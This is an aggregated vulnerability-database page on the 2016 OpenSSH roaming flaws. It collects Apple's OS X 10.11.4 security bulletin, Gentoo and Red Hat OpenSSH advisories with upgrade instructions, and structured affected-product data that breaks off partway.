Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
APPLE-SA-2016-03-21-5 OS X El Capitan 10.11.4 and Security Update 2016-002
OS X El Capitan 10.11.4 and Security Update 2016-002 is now available and addresses the following:
apache_mod_php Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted .png file may lead to arbitrary code execution Description: Multiple vulnerabilities existed in libpng versions prior to 1.6.20. These were addressed by updating libpng to version 1.6.20. CVE-ID CVE-2015-8126 : Adam Mariš CVE-2015-8472 : Adam Mariš
AppleRAID Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved input validation. CVE-ID CVE-2016-1733 : Proteas of Qihoo 360 Nirvan Team
AppleRAID Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A local user may be able to determine kernel memory layout Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation. CVE-ID CVE-2016-1732 : Proteas of Qihoo 360 Nirvan Team
AppleUSBNetworking Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue existed in the parsing of data from USB devices. This issue was addressed through improved input validation. CVE-ID CVE-2016-1734 : Andrea Barisani and Andrej Rosano of Inverse Path
Bluetooth Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1735 : Jeonghoon Shin@A.D.D CVE-2016-1736 : beist and ABH of BoB
Carbon Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the handling of font files. These issues were addressed through improved bounds checking. CVE-ID CVE-2016-1737 : an anonymous researcher
dyld Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An attacker may tamper with code-signed applications to execute arbitrary code in the application's context Description: A code signing verification issue existed in dyld. CVE-ID CVE-2016-1738 : beist and ABH of BoB
FontParser Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue was addressed through improved memory handling. CVE-ID CVE-2016-1740 : HappilyCoded (ant4g0nist and r3dsm0k3) working with Trend Micro's Zero Day Initiative (ZDI)
HTTPProtocol Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A remote attacker may be able to execute arbitrary code Description: Multiple vulnerabilities existed in nghttp2 versions prior to 1.6.0, the most serious of which may have led to remote code execution. These were addressed by updating nghttp2 to version 1.6.0. CVE-ID CVE-2015-8659
Intel Graphics Driver Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1743 : Piotr Bania of Cisco Talos CVE-2016-1744 : Ian Beer of Google Project Zero
IOFireWireFamily Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A local user may be able to cause a denial of service Description: A null pointer dereference was addressed through improved validation. CVE-ID CVE-2016-1745 : sweetchip of Grayhash
IOGraphics Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved input validation. CVE-ID CVE-2016-1746 : Peter Pi of Trend Micro working with Trend Micro's Zero Day Initiative (ZDI) CVE-2016-1747 : Juwei Lin of Trend Micro working with Trend Micro's Zero Day Initiative (ZDI)
IOHIDFamily Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to determine kernel memory layout Description: A memory corruption issue was addressed through improved memory handling. CVE-ID CVE-2016-1748 : Brandon Azad
IOUSBFamily Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1749 : Ian Beer of Google Project Zero and Juwei Lin of Trend Micro working with Trend Micro's Zero Day Initiative (ZDI)
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A use after free issue was addressed through improved memory management. CVE-ID CVE-2016-1750 : CESG
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A race condition existed during the creation of new processes. This was addressed through improved state handling. CVE-ID CVE-2016-1757 : Ian Beer of Google Project Zero and Pedro Vilaca
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A null pointer dereference was addressed through improved input validation. CVE-ID CVE-2016-1756 : Lufeng Li of Qihoo 360 Vulcan Team
Kernel Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1754 : Lufeng Li of Qihoo 360 Vulcan Team CVE-2016-1755 : Ian Beer of Google Project Zero CVE-2016-1759 : lokihardt
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to determine kernel memory layout Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation. CVE-ID CVE-2016-1758 : Brandon Azad
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple integer overflows were addressed through improved input validation. CVE-ID CVE-2016-1753 : Juwei Lin Trend Micro working with Trend Micro's Zero Day Initiative (ZDI)
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to cause a denial of service Description: A denial of service issue was addressed through improved validation. CVE-ID CVE-2016-1752 : CESG
libxml2 Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: Processing maliciously crafted XML may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2015-1819 CVE-2015-5312 : David Drysdale of Google CVE-2015-7499 CVE-2015-7500 : Kostya Serebryany of Google CVE-2015-7942 : Kostya Serebryany of Google CVE-2015-8035 : gustavo.grieco CVE-2015-8242 : Hugh Davenport CVE-2016-1761 : wol0xff working with Trend Micro's Zero Day Initiative (ZDI) CVE-2016-1762
Messages Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An attacker who is able to bypass Apple's certificate pinning, intercept TLS connections, inject messages, and record encrypted attachment-type messages may be able to read attachments Description: A cryptographic issue was addressed by rejecting duplicate messages on the client. CVE-ID CVE-2016-1788 : Christina Garman, Matthew Green, Gabriel Kaptchuk, Ian Miers, and Michael Rushanan of Johns Hopkins University
Messages Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Clicking a JavaScript link can reveal sensitive user information Description: An issue existed in the processing of JavaScript links. This issue was addressed through improved content security policy checks. CVE-ID CVE-2016-1764 : Matthew Bryan of the Uber Security Team (formerly of Bishop Fox), Joe DeMesy and Shubham Shah of Bishop Fox
NVIDIA Graphics Drivers Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1741 : Ian Beer of Google Project Zero
OpenSSH Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: Connecting to a server may leak sensitive user information, such as a client's private keys Description: Roaming, which was on by default in the OpenSSH client, exposed an information leak and a buffer overflow. These issues were addressed by disabling roaming in the client. CVE-ID CVE-2016-0777 : Qualys CVE-2016-0778 : Qualys
OpenSSH Available for: OS X Mavericks v10.9.5 and OS X Yosemite v10.10.5 Impact: Multiple vulnerabilities in LibreSSL Description: Multiple vulnerabilities existed in LibreSSL versions prior to 2.1.8. These were addressed by updating LibreSSL to version 2.1.8. CVE-ID CVE-2015-5333 : Qualys CVE-2015-5334 : Qualys
OpenSSL Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A remote attacker may be able to cause a denial of service Description: A memory leak existed in OpenSSL versions prior to 0.9.8zh. This issue was addressed by updating OpenSSL to version 0.9.8zh. CVE-ID CVE-2015-3195
Python Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted .png file may lead to arbitrary code execution Description: Multiple vulnerabilities existed in libpng versions prior to 1.6.20. These were addressed by updating libpng to version 1.6.20. CVE-ID CVE-2014-9495 CVE-2015-0973 CVE-2015-8126 : Adam Mariš CVE-2015-8472 : Adam Mariš
QuickTime Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted FlashPix Bitmap Image may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1767 : Francis Provencher from COSIG CVE-2016-1768 : Francis Provencher from COSIG
QuickTime Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted Photoshop document may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1769 : Francis Provencher from COSIG
Reminders Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Clicking a tel link can make a call without prompting the user Description: A user was not prompted before invoking a call. This was addressed through improved entitlement checks. CVE-ID CVE-2016-1770 : Guillaume Ross of Rapid7 and Laurent Chouinard of Laurent.ca
Ruby Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A local attacker may be able to cause unexpected application termination or arbitrary code execution Description: An unsafe tainted string usage vulnerability existed in versions prior to 2.0.0-p648. CVE-ID CVE-2015-7551
Security Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A local user may be able to check for the existence of arbitrary files Description: A permissions issue existed in code signing tools. This was addressed though additional ownership checks. CVE-ID CVE-2016-1773 : Mark Mentovai of Google Inc.
Security Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted certificate may lead to arbitrary code execution Description: A memory corruption issue existed in the ASN.1 decoder. This issue was addressed through improved input validation. CVE-ID CVE-2016-1950 : Francis Gabriel of Quarkslab
Tcl
Available for:
OS X Yosemite v10.10.5 and OS X El Capitan v10.11 to v10.11.3
Impact: Processing a maliciously crafted .png file may lead to
arbitrary code execution
Description: Multiple vulnerabilities existed in libpng versions
prior to 1.6.20. These were addressed by removing libpng.
CVE-ID
CVE-2015-8126 : Adam Mariš
TrueTypeScaler Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2016-1775 : 0x1byte working with Trend Micro's Zero Day Initiative (ZDI)
Wi-Fi Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An attacker with a privileged network position may be able to execute arbitrary code Description: A frame validation and memory corruption issue existed for a given ethertype. This issue was addressed through additional ethertype validation and improved memory handling. CVE-ID CVE-2016-0801 : an anonymous researcher CVE-2016-0802 : an anonymous researcher
OS X El Capitan 10.11.4 includes the security content of Safari 9.1. https://support.apple.com/kb/HT206171
OS X El Capitan v10.11.4 and Security Update 2016-002 may be obtained from the Mac App Store or Apple's Software Downloads web site: http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Comment: GPGTools - https://gpgtools.org
iQIcBAEBCgAGBQJW8JQFAAoJEBcWfLTuOo7tZSYP/1bHFA1qemkD37uu7nYpk/q6 ARVsPgME1I1+5tOxX0TQJgzMBmdQsKYdsTiLpDk5HTuv+dAMsFfasaUItGk8Sz1w HiYjSfVsxL+Pjz3vK8/4/fsi2lX6472MElRw8gudITOhXtniGcKo/vuA5dB+vM3l Jy1NLHHhZ6BD2t0bBmlz41mZMG3AMxal2wfqE+5LkjUwASzcvC/3B1sh7Fntwyau /71vIgMQ5AaETdgQJAuQivxPyTlFduBRgLjqvPiB9eSK4Ctu5t/hErFIrP2NiDCi UhfZC48XbiRjJfkUsUD/5TIKnI+jkZxOnch9ny32dw2kUIkbIAbqufTkzsMXOpng O+rI93Ni7nfzgI3EkI2bq+C+arOoRiveWuJvc3SMPD5RQHo4NCQVs0ekQJKNHF78 juPnY29n8WMjwLS6Zfm+bH+n8ELIXrmmEscRztK2efa9S7vJe+AgIxx7JE/f8OHF i9K7UQBXFXcpMjXi1aTby/IUnpL5Ny4NVwYwIhctj0Mf6wTH7uf/FMWYIQOXcIfP Izo+GXxNeLd4H2ypZ+UpkZg/Sn2mtCd88wLc96+owlZPBlSqWl3X1wTlp8i5FP2X qlQ7RcTHJDv8jPT/MOfzxEK1n/azp45ahHA0o6nohUdxlA7PLci9vPiJxqKPo/0q VZmOKa8qMxB1L/JmdCqy =mZR+ -----END PGP SIGNATURE----- .
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/openssh < 7.1_p2 >= 7.1_p2
Description
Qualys have reported two issues in the "roaming" code included in the OpenSSH client, which provides undocumented, experimental support for resuming SSH connections. To do so, add "UseRoaming no" to the SSH client configuration, or specify "-o 'UseRoaming no'" on the command line.
Resolution
All OpenSSH users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/openssh-7.1_p2"
References
[ 1 ] CVE-2016-0777 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0777 [ 2 ] CVE-2016-0778 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0778
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201601-01
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: openssh security update Advisory ID: RHSA-2016:0043-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-0043.html Issue date: 2016-01-14 CVE Names: CVE-2016-0777 CVE-2016-0778 =====================================================================
- Summary:
Updated openssh packages that fix two security issues are now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
OpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation. These packages include the core files necessary for both the OpenSSH client and server. (CVE-2016-0778)
Red Hat would like to thank Qualys for reporting these issues.
All openssh users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing this update, the OpenSSH server daemon (sshd) will be restarted automatically. Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: openssh-6.6.1p1-23.el7_2.src.rpm
x86_64: openssh-6.6.1p1-23.el7_2.x86_64.rpm openssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm openssh-clients-6.6.1p1-23.el7_2.x86_64.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-6.6.1p1-23.el7_2.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: openssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: openssh-6.6.1p1-23.el7_2.src.rpm
x86_64: openssh-6.6.1p1-23.el7_2.x86_64.rpm openssh-clients-6.6.1p1-23.el7_2.x86_64.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-6.6.1p1-23.el7_2.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: openssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm openssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: openssh-6.6.1p1-23.el7_2.src.rpm
ppc64: openssh-6.6.1p1-23.el7_2.ppc64.rpm openssh-askpass-6.6.1p1-23.el7_2.ppc64.rpm openssh-clients-6.6.1p1-23.el7_2.ppc64.rpm openssh-debuginfo-6.6.1p1-23.el7_2.ppc64.rpm openssh-keycat-6.6.1p1-23.el7_2.ppc64.rpm openssh-server-6.6.1p1-23.el7_2.ppc64.rpm
ppc64le: openssh-6.6.1p1-23.el7_2.ppc64le.rpm openssh-askpass-6.6.1p1-23.el7_2.ppc64le.rpm openssh-clients-6.6.1p1-23.el7_2.ppc64le.rpm openssh-debuginfo-6.6.1p1-23.el7_2.ppc64le.rpm openssh-keycat-6.6.1p1-23.el7_2.ppc64le.rpm openssh-server-6.6.1p1-23.el7_2.ppc64le.rpm
s390x: openssh-6.6.1p1-23.el7_2.s390x.rpm openssh-askpass-6.6.1p1-23.el7_2.s390x.rpm openssh-clients-6.6.1p1-23.el7_2.s390x.rpm openssh-debuginfo-6.6.1p1-23.el7_2.s390x.rpm openssh-keycat-6.6.1p1-23.el7_2.s390x.rpm openssh-server-6.6.1p1-23.el7_2.s390x.rpm
x86_64: openssh-6.6.1p1-23.el7_2.x86_64.rpm openssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm openssh-clients-6.6.1p1-23.el7_2.x86_64.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-6.6.1p1-23.el7_2.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: openssh-debuginfo-6.6.1p1-23.el7_2.ppc.rpm openssh-debuginfo-6.6.1p1-23.el7_2.ppc64.rpm openssh-ldap-6.6.1p1-23.el7_2.ppc64.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.ppc64.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.ppc.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.ppc64.rpm
ppc64le: openssh-debuginfo-6.6.1p1-23.el7_2.ppc64le.rpm openssh-ldap-6.6.1p1-23.el7_2.ppc64le.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.ppc64le.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.ppc64le.rpm
s390x: openssh-debuginfo-6.6.1p1-23.el7_2.s390.rpm openssh-debuginfo-6.6.1p1-23.el7_2.s390x.rpm openssh-ldap-6.6.1p1-23.el7_2.s390x.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.s390x.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.s390.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.s390x.rpm
x86_64: openssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: openssh-6.6.1p1-23.el7_2.src.rpm
x86_64: openssh-6.6.1p1-23.el7_2.x86_64.rpm openssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm openssh-clients-6.6.1p1-23.el7_2.x86_64.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-6.6.1p1-23.el7_2.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: openssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2016-0777 https://access.redhat.com/security/cve/CVE-2016-0778 https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/articles/2123781
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFWmAWQXlSAg2UNWIIRAh17AJ9SiT1MA1YtOA6ctMp9jIo4e9XrFwCgkbmo nXgYWs8cZcyoTRVoriTGHQo= =1sk9 -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201601-0030", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "unified threat management software", "scope": "eq", "trust": 1.6, "vendor": "sophos", "version": "9.353" }, { "model": "linux", "scope": "eq", "trust": 1.3, "vendor": "oracle", "version": "7" }, { "model": "solaris", "scope": "eq", "trust": 1.3, "vendor": "oracle", "version": "11.3" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "5.5" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "5.6" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.1" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.8" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "5.4" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.4" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.2" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "5.9" }, { "model": "mac os x", "scope": "gte", "trust": 1.0, "vendor": "apple", "version": "10.9.0" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.3" }, { "model": "mac os x", "scope": "lte", "trust": 1.0, "vendor": "apple", "version": "10.10.5" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "5.8" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.0" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.6" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.9" }, { "model": "virtual customer access system", "scope": "lte", "trust": 1.0, "vendor": "hp", "version": "15.07" }, { "model": "mac os x", "scope": "gte", "trust": 1.0, "vendor": "apple", "version": "10.10.0" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "5.7" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.5" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.7" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "7.0" }, { "model": "mac os x", "scope": "gte", "trust": 1.0, "vendor": "apple", "version": "10.11.0" }, { "model": "mac os x", "scope": "lte", "trust": 1.0, "vendor": "apple", "version": "10.11.3" }, { "model": "mac os x", "scope": "lte", "trust": 1.0, "vendor": "apple", "version": "10.9.5" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "7.1" }, { "model": null, "scope": null, "trust": 0.8, "vendor": "debian gnu linux", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "hardened bsd", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "openbsd", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "openssh", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "ubuntu", "version": null }, { "model": "openssh", "scope": "lt", "trust": 0.8, "vendor": "openbsd", "version": "7.x" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.9.5" }, { "model": "openssh", "scope": "eq", "trust": 0.8, "vendor": "openbsd", "version": "5.x" }, { "model": "utm software", "scope": null, "trust": 0.8, "vendor": "sophos", "version": null }, { "model": "linux", "scope": null, "trust": 0.8, "vendor": "oracle", "version": null }, { "model": "openssh", "scope": "eq", "trust": 0.8, "vendor": "openbsd", "version": "6.x" }, { "model": "hpe remote device access: virtual customer access system", "scope": null, "trust": 0.8, "vendor": "hewlett packard", "version": null }, { "model": "openssh", "scope": "eq", "trust": 0.8, "vendor": "openbsd", "version": "7.1p2" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.10.5" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.11 to 10.11.3" }, { "model": "solaris", "scope": null, "trust": 0.8, "vendor": "oracle", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "nsmexpress", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.16" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.1" }, { "model": "junos 14.2r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "nsm3000", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "junos 13.3r4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.0.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.3" }, { "model": "purepower integrated manager service appliance", "scope": "eq", "trust": 0.3, 